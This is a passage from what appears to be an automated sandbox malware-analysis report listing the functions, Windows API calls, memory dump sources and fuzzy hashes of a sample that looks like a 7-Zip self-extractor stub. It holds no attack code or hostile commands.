                                                                    • Instruction Fuzzy Hash: 54D012B6A00108BBDB159F85E945BDEF778EB5135AF10402FB001A1540D7B85A519669
                                                                    Function 0040CA73 Relevance: 1.5, APIs: 1, Instructions: 9timeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetFileTime.KERNELBASE(?,?,?,?,0040CA9D,00000000,00000000,?,00401283,?), ref: 0040CA81
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: FileTime
                                                                    • String ID:
                                                                    • API String ID: 1425588814-0
                                                                    • Opcode ID: 3ce96db92dac49fc9d73cad444b7c0058786613d71d531d4d45718336f5b86ac
                                                                    • Instruction ID: de5aedd212665daa2fb0c30df7e581d57bf74256c4b77fd25e19f66411ac9bb8
                                                                    • Opcode Fuzzy Hash: 3ce96db92dac49fc9d73cad444b7c0058786613d71d531d4d45718336f5b86ac
                                                                    • Instruction Fuzzy Hash: 09C04C36158105FFCF020FB0CC04C5ABFA2AF99311F10C918B159C4070C7328024EB02
                                                                    Function 0040CE83 Relevance: 1.3, APIs: 1, Instructions: 70COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000060), ref: 0040CEFE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: ??2@
                                                                    • String ID:
                                                                    • API String ID: 1033339047-0
                                                                    • Opcode ID: 44ff9f97dd3702d7ca69990b92a65016c2b32a6d45cca806f690b46cab85baab
                                                                    • Instruction ID: cab80700ff2ef97e3e68849728e007b5961c94ff6a6edc9b3495ca6231c3d80c
                                                                    • Opcode Fuzzy Hash: 44ff9f97dd3702d7ca69990b92a65016c2b32a6d45cca806f690b46cab85baab
                                                                    • Instruction Fuzzy Hash: 23214A32604246DBCB34AF61D8D086BB3A6AF403557244A3FE442776D1C738AC479BDA
                                                                    Function 004032D9 Relevance: 1.3, APIs: 1, Instructions: 17COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000018,00000000,004049F2,?,?,?), ref: 004032DE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: ??2@
                                                                    • String ID:
                                                                    • API String ID: 1033339047-0
                                                                    • Opcode ID: 5da00d81305d43432be94bf511d636d1c0af40f6c688cac88fa34fe88ae8ac90
                                                                    • Instruction ID: 04593239a52e0b24a0a84900efeb5de78bbbd7c33ac0e85a63675f9701e427e5
                                                                    • Opcode Fuzzy Hash: 5da00d81305d43432be94bf511d636d1c0af40f6c688cac88fa34fe88ae8ac90
                                                                    • Instruction Fuzzy Hash: 92D0223230422029DA64393A0907AFF4C8C8F90361F00487FB804EA2C1ED7CCE81228D
                                                                    Function 0040C88E Relevance: 1.3, APIs: 1, Instructions: 16COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CloseHandle.KERNELBASE(00419858,?,0040C96A,00000000,?,0040C9B2,[@,80000000,?,?,?,0040C9D4,?,00419858,00000003,00000080), ref: 0040C899
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: CloseHandle
                                                                    • String ID:
                                                                    • API String ID: 2962429428-0
                                                                    • Opcode ID: 260953eaa766690f6dd42752837e02fd8dd2a8d38b84a545f9bc6d2c9a71c262
                                                                    • Instruction ID: 46fd5d44533f688af1cbb16b01e3684df0873ba17e3ffd79ac6e97726efa63b3
                                                                    • Opcode Fuzzy Hash: 260953eaa766690f6dd42752837e02fd8dd2a8d38b84a545f9bc6d2c9a71c262
                                                                    • Instruction Fuzzy Hash: 53D0123220456186DA782F7CB8C45C237D96E56331331476BF0B6D72E4D3788C835A98
                                                                    Function 00402739 Relevance: 1.3, APIs: 1, Instructions: 12memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,0040D8FF,?,?,?,004096BF,?), ref: 00402755
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: AllocVirtual
                                                                    • String ID:
                                                                    • API String ID: 4275171209-0
                                                                    • Opcode ID: 1d947fdf6df5f70e4621f0431d731520913ac8a11474ad35aa364c7fd2a883a0
                                                                    • Instruction ID: ef3627dbe8ede4864a94ca482c41f1f7a661cdc9e7d225e9ae9e2bc502ca7986
                                                                    • Opcode Fuzzy Hash: 1d947fdf6df5f70e4621f0431d731520913ac8a11474ad35aa364c7fd2a883a0
                                                                    • Instruction Fuzzy Hash: D5C0803014430079ED1137608E07B4936526B80716F50C465F344540F0D7F544005509
                                                                    Function 00401CFA Relevance: 1.3, APIs: 1, Instructions: 7COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • VirtualFree.KERNELBASE(?,00000000,00008000,0040D8A7,00000000,?,0040D8F6,?,?,004096BF,?), ref: 00401D0C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: FreeVirtual
                                                                    • String ID:
                                                                    • API String ID: 1263568516-0
                                                                    • Opcode ID: 6a62ac4a4d7dac27c13b63ea0cba825f676e2686878a6172cdbdd2a29a859d51
                                                                    • Instruction ID: 1004f56851fc8b889ccfe642d75eb19623be02efc3220bf612975ac128c53eb9
                                                                    • Opcode Fuzzy Hash: 6a62ac4a4d7dac27c13b63ea0cba825f676e2686878a6172cdbdd2a29a859d51
                                                                    • Instruction Fuzzy Hash: 7FB09230544700FEEF224B00DE09B8A76A0ABC0B05F30C528B188641F087B56804EA09

                                                                    Non-executed Functions

                                                                    Function 0040385E Relevance: 37.0, APIs: 20, Strings: 1, Instructions: 290comCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _wtol.MSVCRT ref: 00403882
                                                                    • SHGetSpecialFolderPathW.SHELL32(00000000,?,DF20E863,00000000,00419828,00000000,0041981C), ref: 00403925
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00403996
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?), ref: 0040399E
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?), ref: 004039A6
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?), ref: 004039AE
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?), ref: 004039B6
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 004039BE
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 004039C6
                                                                    • _wtol.MSVCRT ref: 00403A1C
                                                                    • CoCreateInstance.OLE32(00416E70,00000000,00000001,00416E30,00405712,.lnk,?,0000005C), ref: 00403ABD
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,0000005C), ref: 00403B55
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,0000005C), ref: 00403B5D
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,0000005C), ref: 00403B65
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,0000005C), ref: 00403B6D
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,0000005C), ref: 00403B75
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,0000005C), ref: 00403B7D
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,0000005C), ref: 00403B85
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,0000005C), ref: 00403B8B
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,0000005C), ref: 00403B93
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@$_wtol$CreateFolderInstancePathSpecial
                                                                    • String ID: .lnk
                                                                    • API String ID: 408529070-24824748
                                                                    • Opcode ID: 1948e0700340f48ec15fd9fe2690368c0dd61efe9497a1a1bad70624b13cca41
                                                                    • Instruction ID: 6a4e2cb34307125d1aa254537a73282d765d300cba51a9a08192486ca10ed339
                                                                    • Opcode Fuzzy Hash: 1948e0700340f48ec15fd9fe2690368c0dd61efe9497a1a1bad70624b13cca41
                                                                    • Instruction Fuzzy Hash: 4DA18E71D10249ABDF14EFA1CC469EEBB78FF1430AF50442AF406B71A1DB389A42DB18
                                                                    Function 00402187 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 150stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetLastError.KERNEL32(00000000,00000020,-00000002), ref: 004021D6
                                                                    • wsprintfW.USER32 ref: 004021E7
                                                                    • GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 004021FC
                                                                    • GetLastError.KERNEL32 ref: 00402201
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040221C
                                                                    • GetEnvironmentVariableW.KERNEL32(?,00000000,00000004), ref: 0040222F
                                                                    • GetLastError.KERNEL32 ref: 00402236
                                                                    • lstrcmpiW.KERNEL32(00928E78,00404926), ref: 0040224B
                                                                    • ??3@YAXPAX@Z.MSVCRT(00928E78), ref: 0040225B
                                                                    • ??3@YAXPAX@Z.MSVCRT(00404926), ref: 00402279
                                                                    • SetLastError.KERNEL32(?), ref: 00402282
                                                                    • lstrlenA.KERNEL32(00416208), ref: 004022B6
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004022D1
                                                                    • GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402303
                                                                    • _wtol.MSVCRT ref: 00402314
                                                                    • MultiByteToWideChar.KERNEL32(00000000,00416208,00000001,00928E78,00000002), ref: 00402334
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$??2@??3@EnvironmentVariable$ByteCharInfoLocaleMultiWide_wtollstrcmpilstrlenwsprintf
                                                                    • String ID: 7zSfxString%d
                                                                    • API String ID: 2117570002-3906403175
                                                                    • Opcode ID: eb80ecc119c928046d4f48b44d1c37ea9d549868a3ac961d5216fb6842945394
                                                                    • Instruction ID: 10ef73f62a445f8617660be723e0bbad3c81975cf04d4be1a7303cf9b6c1a78d
                                                                    • Opcode Fuzzy Hash: eb80ecc119c928046d4f48b44d1c37ea9d549868a3ac961d5216fb6842945394
                                                                    • Instruction Fuzzy Hash: 82518171900604EFDB219FB5DD59BDABBB9EB48350B10807EE64EE62D0D774AD40CB28
                                                                    Function 00401DC9 Relevance: 26.3, APIs: 11, Strings: 4, Instructions: 85libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00401DD4
                                                                    • FindResourceExA.KERNEL32(00000000,?,?,00000000), ref: 00401DF1
                                                                    • FindResourceExA.KERNEL32(00000000,?,?,00000409), ref: 00401E05
                                                                    • SizeofResource.KERNEL32(00000000,00000000), ref: 00401E16
                                                                    • LoadResource.KERNEL32(00000000,00000000), ref: 00401E20
                                                                    • LockResource.KERNEL32(00000000), ref: 00401E2B
                                                                    • LoadLibraryA.KERNEL32(kernel32,SetProcessPreferredUILanguages), ref: 00401E57
                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00401E60
                                                                    • wsprintfW.USER32 ref: 00401E7F
                                                                    • LoadLibraryA.KERNEL32(kernel32,SetThreadPreferredUILanguages), ref: 00401E94
                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00401E97
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: Resource$Load$AddressFindLibraryProc$HandleLockModuleSizeofwsprintf
                                                                    • String ID: %04X%c%04X%c$SetProcessPreferredUILanguages$SetThreadPreferredUILanguages$kernel32
                                                                    • API String ID: 2639302590-365843014
                                                                    • Opcode ID: 8e2c376142790921a1b7bbf09f4a30eccecb8d2c9c1f9a6d1badee13c63417f8
                                                                    • Instruction ID: f9dda1162ec2f24eaafa78ee80fe21c3398d892f55d41869619f642ebc926886
                                                                    • Opcode Fuzzy Hash: 8e2c376142790921a1b7bbf09f4a30eccecb8d2c9c1f9a6d1badee13c63417f8
                                                                    • Instruction Fuzzy Hash: B5214C72900608FBDB119FA4DC08FDF3ABDEB84711F158426FA05A6291D7B89D40CBA8
                                                                    Function 00408DBF Relevance: 16.6, APIs: 11, Instructions: 96stringwindowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • wvsprintfW.USER32(?,00000000,?), ref: 00408DE3
                                                                    • GetLastError.KERNEL32 ref: 00408DF4
                                                                    • FormatMessageW.KERNEL32(00001100,00000000,00000000,?,?,00000000,00406B79), ref: 00408E1C
                                                                    • FormatMessageW.KERNEL32(00001100,00000000,?,00000000,?,00000000,00406B79), ref: 00408E31
                                                                    • lstrlenW.KERNEL32(?), ref: 00408E44
                                                                    • lstrlenW.KERNEL32(?), ref: 00408E4B
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00408E60
                                                                    • lstrcpyW.KERNEL32(00000000,?), ref: 00408E76
                                                                    • lstrcpyW.KERNEL32(-00000002,?), ref: 00408E87
                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,00000000), ref: 00408E90
                                                                    • LocalFree.KERNEL32(?), ref: 00408E9A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: FormatMessagelstrcpylstrlen$??2@??3@ErrorFreeLastLocalwvsprintf
                                                                    • String ID:
                                                                    • API String ID: 829399097-0
                                                                    • Opcode ID: 70cd8bc1ebd143203d5f1bc79ab162f2f6f4eb1175f08b3b1613c25f11187359
                                                                    • Instruction ID: c91527b0869a4d5de4249670dcf9d0912663d9707098e08fcc2f2580e19cfeee
                                                                    • Opcode Fuzzy Hash: 70cd8bc1ebd143203d5f1bc79ab162f2f6f4eb1175f08b3b1613c25f11187359
                                                                    • Instruction Fuzzy Hash: 41218176800208FFDB149FA0DD85DEB7BACEF44354B10807BF945A6190EF34AE858BA4
                                                                    Function 00402EE6 Relevance: 16.6, APIs: 11, Instructions: 90filestringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • FindFirstFileW.KERNEL32(?,?,004155D0,?,?,?,00000000), ref: 00402F15
                                                                    • lstrcmpW.KERNEL32(?,004155CC,?,0000005C,?,?,?,00000000), ref: 00402F68
                                                                    • lstrcmpW.KERNEL32(?,004155C4,?,?,00000000), ref: 00402F7E
                                                                    • SetFileAttributesW.KERNEL32(?,00000000,?,0000005C,?,?,?,00000000), ref: 00402F94
                                                                    • DeleteFileW.KERNEL32(?,?,?,00000000), ref: 00402F9B
                                                                    • FindNextFileW.KERNEL32(00000000,00000010,?,?,00000000), ref: 00402FAD
                                                                    • FindClose.KERNEL32(00000000,?,?,00000000), ref: 00402FBC
                                                                    • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000000), ref: 00402FC7
                                                                    • RemoveDirectoryW.KERNEL32(?,?,?,00000000), ref: 00402FD0
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 00402FDB
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 00402FE6
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: File$Find$??3@Attributeslstrcmp$CloseDeleteDirectoryFirstNextRemove
                                                                    • String ID:
                                                                    • API String ID: 1862581289-0
                                                                    • Opcode ID: 839cb6fd099afb1d89a388e6f192fb9bcf45602aedd80242c8a3aefe3316d1c0
                                                                    • Instruction ID: e3ea1660441bcf3a3f7f20395b47020d8d3d19c9c96888f58badb5dcc8a6e628
                                                                    • Opcode Fuzzy Hash: 839cb6fd099afb1d89a388e6f192fb9bcf45602aedd80242c8a3aefe3316d1c0
                                                                    • Instruction Fuzzy Hash: 7A218631A04209FBDB11AB71DD8DFEF3B7CAF44745F50407AB805B21D0EBB89A459A68
                                                                    Function 00408630 Relevance: 7.5, APIs: 5, Instructions: 47threadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetCurrentThreadId.KERNEL32 ref: 0040864F
                                                                    • SetWindowsHookExW.USER32(00000007,Function_00008576,00000000,00000000), ref: 0040865A
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00408669
                                                                    • SetWindowsHookExW.USER32(00000002,Function_00008602,00000000,00000000), ref: 00408674
                                                                    • EndDialog.USER32(?,00000000), ref: 0040869A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentHookThreadWindows$Dialog
                                                                    • String ID:
                                                                    • API String ID: 1967849563-0
                                                                    • Opcode ID: 3c307380277fa9ea080ffec5c86f5ec4071e690be1bfbef556a541cbc554ab57
                                                                    • Instruction ID: a1df587bc44f7b8848174d41fcc6ca6bf5c09d6170abc4bd78dad765c28a629c
                                                                    • Opcode Fuzzy Hash: 3c307380277fa9ea080ffec5c86f5ec4071e690be1bfbef556a541cbc554ab57
                                                                    • Instruction Fuzzy Hash: 93012671600218DFD3106B7AED44AB3F7ECEB85755B12843FE202921A0CAB79C008F6C
                                                                    Function 0040244E Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • AllocateAndInitializeSid.ADVAPI32(00406032,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,0000000A,-00000008,00406032,?,00000000,0000000A), ref: 00402487
                                                                    • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00402499
                                                                    • FreeSid.ADVAPI32(?), ref: 004024A2
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                    • String ID:
                                                                    • API String ID: 3429775523-0
                                                                    • Opcode ID: 61f8cf9d4fe0a411273f6da1a0187a3308019e8c7258d9cc8422d2cdfcfadd87
                                                                    • Instruction ID: fcbafef67fd355d70295d2c1b6ce6e7585022550186800af39a78ba60eef4ec0
                                                                    • Opcode Fuzzy Hash: 61f8cf9d4fe0a411273f6da1a0187a3308019e8c7258d9cc8422d2cdfcfadd87
                                                                    • Instruction Fuzzy Hash: F7F03C72944288FEDB01DBE88D85ADEBF7CAB18304F8480AAA101A2182D2705704CB69
                                                                    Function 0040AD30 Relevance: .5, Instructions: 479COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b1df083afa2ec122568cef5a0170ccce4311ab5785baa6c9343831b33b0cc2ec
                                                                    • Instruction ID: 1deff6650f640bb2d9dcab77f147087c60d03763b1f3dd6742a57df9d51469cf
                                                                    • Opcode Fuzzy Hash: b1df083afa2ec122568cef5a0170ccce4311ab5785baa6c9343831b33b0cc2ec
                                                                    • Instruction Fuzzy Hash: 5F022B72A043124BDB09CE28C59027DBBE2FBC4345F150A3EE89667BC4D7789954C7DA
                                                                    Function 00413D43 Relevance: .1, Instructions: 92COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e781e73348b070714efe4b9f1f387dbcbf5b044bf6c7f23a7a0004d2e0ca769a
                                                                    • Instruction ID: d276be45ba9710969d4d69a2fbd68599cb80de3b2bdcae4a446b37c04d3c8c9c
                                                                    • Opcode Fuzzy Hash: e781e73348b070714efe4b9f1f387dbcbf5b044bf6c7f23a7a0004d2e0ca769a
